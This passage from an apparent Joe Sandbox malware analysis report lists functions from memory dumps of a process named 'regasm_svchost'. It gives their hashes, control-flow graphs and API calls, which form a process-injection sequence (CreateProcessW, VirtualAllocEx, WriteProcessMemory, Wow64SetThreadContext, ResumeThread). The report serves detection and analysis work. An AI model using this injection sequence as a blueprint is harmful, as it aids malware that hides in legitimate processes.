                                                                  • Opcode Fuzzy Hash: b8ffff3af6f7b26186d7ad56ce9e7ada6844c01b4a96c92ebf18f5235f78490e
                                                                  • Instruction Fuzzy Hash: 5921C575E006588BEB18CFABD8443DEFBB3AFC8311F14C17AD409A6254DB751A4A8F90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5EAF8 Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 371 c5eaf8-c5eb8e 373 c5eba5-c5ebb3 371->373 374 c5eb90-c5eba2 371->374 375 c5ebb5-c5ebc7 373->375 376 c5ebca-c5ec06 373->376 374->373 375->376 377 c5ec08-c5ec17 376->377 378 c5ec1a-c5ece7 CreateProcessW 376->378 377->378 382 c5ecf0-c5edaf 378->382 383 c5ece9-c5ecef 378->383 393 c5ede5-c5edf0 382->393 394 c5edb1-c5edda 382->394 383->382 394->393
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C5ECD4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: e32298387938e26ed68e2c13fe70b5edc18b540eb1a1b232e6dd218cd2eaa214
                                                                  • Instruction ID: 5b59f09604b437851c3f7422fff151b9ba302330655c7eb3f4ac1eb84f197e97
                                                                  • Opcode Fuzzy Hash: e32298387938e26ed68e2c13fe70b5edc18b540eb1a1b232e6dd218cd2eaa214
                                                                  • Instruction Fuzzy Hash: 3A81C0B4C00269CFDF64CFA5C980BDDBBB5AF49304F1491AAE908B7250DB709A89CF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5F298 Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 398 c5f298-c5f307 400 c5f31e-c5f37e WriteProcessMemory 398->400 401 c5f309-c5f31b 398->401 402 c5f387-c5f3c5 400->402 403 c5f380-c5f386 400->403 401->400 403->402
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C5F36E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 634825845a68d9ef7362f4ebc1f9e42a79dbb93160f1220bbc29282b1f605537
                                                                  • Instruction ID: 4c605901df94f0ed2eba017544fcefa4ab68fd88881fd49fe140d4e3f0ab50f3
                                                                  • Opcode Fuzzy Hash: 634825845a68d9ef7362f4ebc1f9e42a79dbb93160f1220bbc29282b1f605537
                                                                  • Instruction Fuzzy Hash: 364178B9D012589FDF04CFA9D984ADEFBF1BB49310F24902AE818B7310D375AA45CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5F068 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 419 c5f068-c5f12d ReadProcessMemory 421 c5f136-c5f174 419->421 422 c5f12f-c5f135 419->422 422->421
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C5F11D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: aeab62c1918afd1e198dd5233260042bc7ce220a5130b3159116076d418fc6b3
                                                                  • Instruction ID: 2f244cba31b44b4dcdc0b732cee4912beca05771cf4ec370e070c98330a8f6a1
                                                                  • Opcode Fuzzy Hash: aeab62c1918afd1e198dd5233260042bc7ce220a5130b3159116076d418fc6b3
                                                                  • Instruction Fuzzy Hash: 804177B9D04258DFCF10CFAAD984ADEFBB1BB19310F14A02AE914B7210D375AA45CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C59860 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 425 c59860-c5991f VirtualProtect 427 c59921-c59927 425->427 428 c59928-c59964 425->428 427->428
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C5990F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: d555a11c32dcb462e26ea272db62eabba68bc9d98ad4ac43d4203b5569278dd9
                                                                  • Instruction ID: 0065681d5f0ee2b9c6a70ba0755d1a516ea1fa37d96b805cb5df7bd28cadbd68
                                                                  • Opcode Fuzzy Hash: d555a11c32dcb462e26ea272db62eabba68bc9d98ad4ac43d4203b5569278dd9
                                                                  • Instruction Fuzzy Hash: 8B31ABB9D042589FCF10CFA9D984ADEFBB0BF09310F14905AE814B7210D374A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5F188 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 431 c5f188-c5f245 VirtualAllocEx 433 c5f247-c5f24d 431->433 434 c5f24e-c5f284 431->434 433->434
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C5F235
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 62d9acabe9bf85bf71c965827bb425dc62b5f3d5f7687657f7efa908eeb52dcb
                                                                  • Instruction ID: 085c3c14ad7f9fb6b1aa0b0eef3591152438f2541eb40b8c6528b7c40adde85f
                                                                  • Opcode Fuzzy Hash: 62d9acabe9bf85bf71c965827bb425dc62b5f3d5f7687657f7efa908eeb52dcb
                                                                  • Instruction Fuzzy Hash: 873165B9D042589FCF14CFA9D984A9EFBB1BB19310F10A02AE814B7310D375A946CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C59868 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 437 c59868-c5991f VirtualProtect 439 c59921-c59927 437->439 440 c59928-c59964 437->440 439->440
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C5990F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: dc50044c57eee28b975ee8396363020807c4b7e854c9e2bb9f1f2960aaf8397e
                                                                  • Instruction ID: 0942d95ec882450ff7f7939136ce9a28bf7da7c632148256930a7e5d984f97d7
                                                                  • Opcode Fuzzy Hash: dc50044c57eee28b975ee8396363020807c4b7e854c9e2bb9f1f2960aaf8397e
                                                                  • Instruction Fuzzy Hash: 2E3178B9D042589FCF10CFA9D584ADEFBB0BB19310F24906AE818B7210D775AA85CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5EF50 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C5F002
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: c9d94bd6a7388f256c5f843fffdaa79c154f27da14e51ebc1c09d27867ad4b99
                                                                  • Instruction ID: 1a44dd96a307e7e123b8c38804b6571a70a95c2244fae71a1322607400c4184e
                                                                  • Opcode Fuzzy Hash: c9d94bd6a7388f256c5f843fffdaa79c154f27da14e51ebc1c09d27867ad4b99
                                                                  • Instruction Fuzzy Hash: A3319AB4D012589FCB14CFA9D984ADEFBF1BB49314F24802AE414B7250D774AA85CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0168 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OutputDebugStringW.KERNELBASE(?), ref: 007C169A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DebugOutputString
                                                                  • String ID:
                                                                  • API String ID: 1166629820-0
                                                                  • Opcode ID: 11c92a3648a7de918fb8e3967a01efb05a7890d8c363a446e46232cd1c4e1701
                                                                  • Instruction ID: 33d78de917377c22d2aaa8848e0bac70fabdffb6d60649566f782c6ed4c67241
                                                                  • Opcode Fuzzy Hash: 11c92a3648a7de918fb8e3967a01efb05a7890d8c363a446e46232cd1c4e1701
                                                                  • Instruction Fuzzy Hash: 9831E0B4D042489FCB10CFA9D984ADEFBF1AF4A314F18906AE814B7321D734A945CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0178 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OutputDebugStringW.KERNELBASE(?), ref: 007C169A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DebugOutputString
                                                                  • String ID:
                                                                  • API String ID: 1166629820-0
                                                                  • Opcode ID: 8aa749199c8589b24860b2fe61de1b6ec9e8400a7cc1a81f64bb4a928d433a82
                                                                  • Instruction ID: 3b1454b2268cbea3c4001183225225300904765878d3910caf71dc39dccf1ccc
                                                                  • Opcode Fuzzy Hash: 8aa749199c8589b24860b2fe61de1b6ec9e8400a7cc1a81f64bb4a928d433a82
                                                                  • Instruction Fuzzy Hash: 21319BB4D042489FCB14CFA9D584ADEFBF1AF4A314F28906AE814B7321D774A945CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C15F9 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OutputDebugStringW.KERNELBASE(?), ref: 007C169A
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DebugOutputString
                                                                  • String ID:
                                                                  • API String ID: 1166629820-0
                                                                  • Opcode ID: b5aababd5053c8818185c3d1cefef61e050d61a797c65f92712af9f1d3e8ce27
                                                                  • Instruction ID: e2a1e24df7b0af6e119620183736fe6d14d37ff39eb58f712125d31a96bf92bc
                                                                  • Opcode Fuzzy Hash: b5aababd5053c8818185c3d1cefef61e050d61a797c65f92712af9f1d3e8ce27
                                                                  • Instruction Fuzzy Hash: 9331BAB4D042088FCB14CFA9E584ADEFBF1AF49314F18906AE818B7321D774A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5F8C0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 00C5F93E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: b0fadf4c58d11becef0502ff29892102269531c7c7a1a37959ecf6207adceb60
                                                                  • Instruction ID: 23fb9aee4f118942b86c378a6b8caad7f42b2cd0877d37ac949ac13c0d912874
                                                                  • Opcode Fuzzy Hash: b0fadf4c58d11becef0502ff29892102269531c7c7a1a37959ecf6207adceb60
                                                                  • Instruction Fuzzy Hash: 922196B8D002089FCB10CFA9E484ADEFBF4AB49320F24906AE914B7310D375A945CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C0190 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?), ref: 007C1776
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 6593e3fd8edf7390c0502fb5c75134e26b64723ae4a123d8e418f892c19bbe0a
                                                                  • Instruction ID: bce57b8d580d5a846b468b9a195b17722270da241f930face6957631f9e32c6a
                                                                  • Opcode Fuzzy Hash: 6593e3fd8edf7390c0502fb5c75134e26b64723ae4a123d8e418f892c19bbe0a
                                                                  • Instruction Fuzzy Hash: 5E31BDB4D042189FCB10CFA9D484AEEFBF4AF0A310F24906AE914B7311D778A944CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 007C16F0 Relevance: 1.3, APIs: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?), ref: 007C1776
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990381674.00000000007C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7c0000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 404c2604cd7d009e7d28cd44860e68e6f204b86b74dcec0af24c90f6f8ce785f
                                                                  • Instruction ID: 05ca4857397ac07e22d345e2e5a0dfef36eed7e5102b443190e27c3dbc5b1e02
                                                                  • Opcode Fuzzy Hash: 404c2604cd7d009e7d28cd44860e68e6f204b86b74dcec0af24c90f6f8ce785f
                                                                  • Instruction Fuzzy Hash: 4E31BFB5D042589FCB10CFA9D484AEEFBF0AF4A320F24956AE815B7350D374A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001ED01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989685792.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1ed000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 368979b23b8d1374a8b8571348e9184441fa1f2f00fdbb6352b1fccb5e062b53
                                                                  • Instruction ID: 0a78ab8a7a0b8588c9094fe5dc62f55e9ea4a926e68dd5d3271c6bb928326878
                                                                  • Opcode Fuzzy Hash: 368979b23b8d1374a8b8571348e9184441fa1f2f00fdbb6352b1fccb5e062b53
                                                                  • Instruction Fuzzy Hash: 88210475604684DFDB14CF15E884B2ABBA1FB88718F38C569E80A4B746C337D847CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989685792.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1ed000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 255ddb4108591bb0c2356f71e69c46628d883d0651237c8af6d8060019d0156e
                                                                  • Instruction ID: 9633ddc77c7659ea28d06bf7d0a71ac68963d76cf3843d71a02be2d77fc54b8b
                                                                  • Opcode Fuzzy Hash: 255ddb4108591bb0c2356f71e69c46628d883d0651237c8af6d8060019d0156e
                                                                  • Instruction Fuzzy Hash: AA210775604685EFDB05CF11E9C0B2ABBA1FB88718F20C569EA094B746C336D846CB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001ED006 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989685792.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1ed000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0bc8361ef91af86ab6c82d4d45c9d88160ea22af422aab035ad07122299e97eb
                                                                  • Instruction ID: 2d9929995a6b46c149c0a6b1984c5eccd02dd19a69bfbb64b077934f8e89eaf1
                                                                  • Opcode Fuzzy Hash: 0bc8361ef91af86ab6c82d4d45c9d88160ea22af422aab035ad07122299e97eb
                                                                  • Instruction Fuzzy Hash: ED217C755097C08FCB02CF24D994B15BF71AB46314F29C5EAD8498B6A7C33A984ACB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001ED1CF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989685792.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1ed000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b76238fb7ed8662660fcdca6eb1e1b63f0cb06879a948e97c6c9b64f4795708
                                                                  • Instruction ID: 70b14edf182cac65fbde526000fa25debca79f052ad92f77136562de37025d73
                                                                  • Opcode Fuzzy Hash: 8b76238fb7ed8662660fcdca6eb1e1b63f0cb06879a948e97c6c9b64f4795708
                                                                  • Instruction Fuzzy Hash: F8118B79904680DFDB12CF14E5C4B19FFA1FB84314F24C6A9D9494B696C33AD84ACB62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001DD1C1 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989664012.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1dd000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e179c6363a88851b19fa3d9cef58817f1eeaf3f20be398bebd742b207e15f38
                                                                  • Instruction ID: 7c8025b2f47651eaeea17f36d81492968a74ef4ad65894fe76dc8977d1e185b1
                                                                  • Opcode Fuzzy Hash: 2e179c6363a88851b19fa3d9cef58817f1eeaf3f20be398bebd742b207e15f38
                                                                  • Instruction Fuzzy Hash: 7501A2320487449AEB208A66EC84B67FF98EF51724F18C55BED055B783D378D844C6B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 001DD1C0 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.989664012.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1dd000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c6ff81292657a8b5a16805b2c38bdc7c6544e3f70478866ffee326448ccea23
                                                                  • Instruction ID: 7a700797a9df0651870b7689adf9453b925455688822e393d164f535d05e29b0
                                                                  • Opcode Fuzzy Hash: 8c6ff81292657a8b5a16805b2c38bdc7c6544e3f70478866ffee326448ccea23
                                                                  • Instruction Fuzzy Hash: 46F06271404244AAEB108A55E8C8B63FFD8EF91734F18C55BED085B282C379DC44CBB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00C52A3B Relevance: .2, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb2291260761b3e95e641c00b1caaeb5a075c7d083fb907a61e96be9128e1c09
                                                                  • Instruction ID: 69aca6388d58b69adafdf6e00a621b2f87e9c71de1cfe8235536322ce1e2e829
                                                                  • Opcode Fuzzy Hash: fb2291260761b3e95e641c00b1caaeb5a075c7d083fb907a61e96be9128e1c09
                                                                  • Instruction Fuzzy Hash: 7D611878E0120ADFCB04CF9AD4809AEFBF2FB89311F208429D815A7315D3749A86DF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C56220 Relevance: .2, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 960551a7260742e417f9ea28562879d74ce8e08a4f23c86b90ce89a43bb3cc4a
                                                                  • Instruction ID: 857f8d88b2014d93ab8fe06236c36e5937e4f969a3de4d523594725832f93121
                                                                  • Opcode Fuzzy Hash: 960551a7260742e417f9ea28562879d74ce8e08a4f23c86b90ce89a43bb3cc4a
                                                                  • Instruction Fuzzy Hash: 5461C374E15219CFCB04CFAAC9809DEFBF2EF89311F64942AD815B7224D7309A468F58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5621D Relevance: .2, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e917d7cbecfdae113f41282d5f73ee77011962064df6295edc1ec219f22e0e9
                                                                  • Instruction ID: 6a9a8d90e7f9e3075300454a6a3ddbce537c65115bce4a2ef3e62c29f819e446
                                                                  • Opcode Fuzzy Hash: 9e917d7cbecfdae113f41282d5f73ee77011962064df6295edc1ec219f22e0e9
                                                                  • Instruction Fuzzy Hash: 7C51D474E052098FCF04CFAAC9809DEFBF2EF89311F64946AD805B7224D7309A468B58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5D520 Relevance: .1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7edd3867462a71393fec29cf1a45b9497819d25393ef091bd846ef0c07040675
                                                                  • Instruction ID: 886db7ef7e1da9e02363bd494f8eb15b5ce73ebe5618e2f08e776d9b4e79f069
                                                                  • Opcode Fuzzy Hash: 7edd3867462a71393fec29cf1a45b9497819d25393ef091bd846ef0c07040675
                                                                  • Instruction Fuzzy Hash: 4C514A75E0462ACBDB28CF66C94079AF7B2FBC9301F1486E6D50DA7650EB305AC59F40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C5718C Relevance: .1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a16699a8f5b48272820e10eb12b8a3fa483570ace9524d00ae7e68f74071719
                                                                  • Instruction ID: 1496179bd307f8e7191d572c994d594a4c7ba0f134cec01394fc73ce7e1954ce
                                                                  • Opcode Fuzzy Hash: 6a16699a8f5b48272820e10eb12b8a3fa483570ace9524d00ae7e68f74071719
                                                                  • Instruction Fuzzy Hash: CF517C71E056188BDB28CF6B8D4439EFAF3BFC9301F14C1BA990CA6264DB300A858F11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C55FE8 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a47581df38a9aa97e4cae2783c9207798dd25a367a060f4c534f9c33d310f000
                                                                  • Instruction ID: b78e3b137b25106854b747266127ebd68acb945d63b66b76f13db81ac3416481
                                                                  • Opcode Fuzzy Hash: a47581df38a9aa97e4cae2783c9207798dd25a367a060f4c534f9c33d310f000
                                                                  • Instruction Fuzzy Hash: D9411CB4E0460A9BCB44CFAAC5805AEFBF2BF88341F64D46AC415B7254D7349A85CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C56458 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.990787598.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c50000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
